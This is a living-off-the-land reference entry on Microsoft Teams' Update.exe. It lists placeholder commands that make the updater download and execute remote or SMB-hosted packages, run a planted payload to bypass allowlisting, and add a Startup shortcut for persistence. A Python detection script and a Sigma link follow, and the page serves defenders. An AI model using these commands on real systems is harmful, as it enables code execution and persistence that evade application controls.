Update.exe
Binary that updates an installed NuGet/Squirrel package. Part of the Microsoft Teams installation.
Paths
C:\Users\<username>\AppData\Local\Microsoft\Teams\update.exe
Commands
Download
The binary will go to the URL, look for the RELEASES file and download the NuGet package.
Use case: Download binary
Privileges: User
Update.exe --download {REMOTEURL}
AWL Bypass
The binary will go to the URL, look for the RELEASES file, then download and install the NuGet package.
Use case: Download and execute binary
Privileges: User
Update.exe --update={REMOTEURL}
Execute
The binary will go to the URL, look for the RELEASES file, then download and install the NuGet package.
Use case: Download and execute binary
Privileges: User
Update.exe --update={REMOTEURL}
AWL Bypass
The binary will go to the SMB share, look for the RELEASES file, then download and install the NuGet package over SMB.
Use case: Download and execute binary
Privileges: User
Update.exe --update={PATH_SMB:folder}
Execute
The binary will go to the SMB share, look for the RELEASES file, then download and install the NuGet package over SMB.
Use case: Download and execute binary
Privileges: User
Update.exe --update={PATH_SMB:folder}
AWL Bypass
The binary will go to the URL, look for the RELEASES file, then download and install the NuGet package.
Use case: Download and execute binary
Privileges: User
Update.exe --updateRollback={REMOTEURL}
Execute
The binary will go to the URL, look for the RELEASES file, then download and install the NuGet package.
Use case: Download and execute binary
Privileges: User
Update.exe --updateRollback={REMOTEURL}
AWL Bypass
Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
Use case: Application Whitelisting Bypass
Privileges: User
Update.exe --processStart {PATH:.exe} --process-start-args "{CMD:args}"
AWL Bypass
The binary will go to the SMB share, look for the RELEASES file, then download and install the NuGet package over SMB.
Use case: Download and execute binary
Privileges: User
Update.exe --updateRollback={PATH_SMB:folder}
Execute
The binary will go to the SMB share, look for the RELEASES file, then download and install the NuGet package over SMB.
Use case: Download and execute binary
Privileges: User
Update.exe --updateRollback={PATH_SMB:folder}
Execute
Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
Use case: Execute binary
Privileges: User
Update.exe --processStart {PATH:.exe} --process-start-args "{CMD:args}"
Execute
Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a shortcut to the specified executable in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Because that is the per-user Startup folder, the payload will then run at every login of the user who ran the command.
Use case: Execute binary
Privileges: User
Update.exe --createShortcut={PATH:.exe} -l=Startup
Execute
Run the command to remove a shortcut from the "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup" directory that was created with the "--createShortcut" execution described on this page.
Use case: Execute binary
Privileges: User
Update.exe --removeShortcut={PATH:.exe} -l=Startup
Detection
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml
- IOC: Update.exe spawned an unknown process
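The IOC above can be turned into a small process-creation check. The following is an added example, not part of the LOLBAS entry or the Sigma rule it links to: it assumes Sysmon-style events with image, command line and parent image fields, flags the switches listed on this page when they point at a URL or UNC share or at an executable Update.exe does not normally start, and flags any child of Update.exe outside an assumed allowlist. The event records and the TEAMS path are constructed sample data.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcessEvent:            # constructed event shape, modelled on Sysmon Event ID 1 fields
    image: str                 # full path of the started process
    command_line: str
    parent_image: str          # full path of the parent process

# Squirrel switches from this page: the first group fetches code from a source, the
# second runs or persists a local executable. A source is "remote" if it is a URL or UNC path.
_REMOTE_SWITCH = re.compile(r"--(updateRollback|update|download)[=\s]+(?P<src>\S+)", re.I)
_LOCAL_SWITCH = re.compile(r"--(processStart|createShortcut)[=\s]+(?P<target>\S+)", re.I)
_REMOTE_SOURCE = re.compile(r"^(https?://|\\\\)", re.I)    # http(s) URL or \\server\share
EXPECTED_CHILDREN = {"teams.exe"}   # assumed allowlist of what Update.exe normally starts

def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].strip('"').lower()

def classify(ev: ProcessEvent) -> list[str]:
    """Return the detection reasons for one event; an empty list means nothing suspicious."""
    reasons = []
    if _basename(ev.image) == "update.exe":
        m = _REMOTE_SWITCH.search(ev.command_line)
        if m and _REMOTE_SOURCE.match(m.group("src").strip('"')):
            reasons.append(f"squirrel-{m.group(1).lower()}-from-remote-source")
        m = _LOCAL_SWITCH.search(ev.command_line)
        if m:
            switch, target = m.group(1).lower(), _basename(m.group("target"))
            if switch == "createshortcut" or target not in EXPECTED_CHILDREN:
                reasons.append(f"squirrel-{switch}-of-{target}")
    # The page's IOC: Update.exe spawned a process it has no business spawning.
    if _basename(ev.parent_image) == "update.exe" and _basename(ev.image) not in EXPECTED_CHILDREN:
        reasons.append("update.exe-spawned-unexpected-child")
    return reasons

def scan(events: list[ProcessEvent]) -> list[tuple[int, list[str]]]:
    """Return (index, reasons) for every event that triggers at least one reason."""
    return [(i, r) for i, ev in enumerate(events) if (r := classify(ev))]

TEAMS = r"C:\Users\alice\AppData\Local\Microsoft\Teams"     # constructed sample path
SAMPLE_EVENTS = [   # constructed telemetry, not real logs; only the first event is benign
    ProcessEvent(TEAMS + r"\Update.exe", 'Update.exe --processStart "Teams.exe"', r"C:\Windows\explorer.exe"),
    ProcessEvent(TEAMS + r"\Update.exe", "Update.exe --update=http://198.51.100.7/pkg", r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(TEAMS + r"\current\tool.exe", "tool.exe", TEAMS + r"\Update.exe"),
    ProcessEvent(TEAMS + r"\Update.exe", "Update.exe --createShortcut=" + TEAMS + r"\current\tool.exe -l=Startup", r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for idx, why in scan(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx].command_line, why)
```

In a real deployment the allowlist and the path under which Update.exe is expected should be tuned to the environment, since Squirrel-based updaters other than Teams ship the same binary.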
Resources
- https://www.youtube.com/watch?v=rOP3hnkj7ls
- https://twitter.com/reegun21/status/1144182772623269889
- https://twitter.com/MrUn1k0d3r/status/1143928885211537408
- https://twitter.com/reegun21/status/1291005287034281990
- http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/
- https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12
- https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/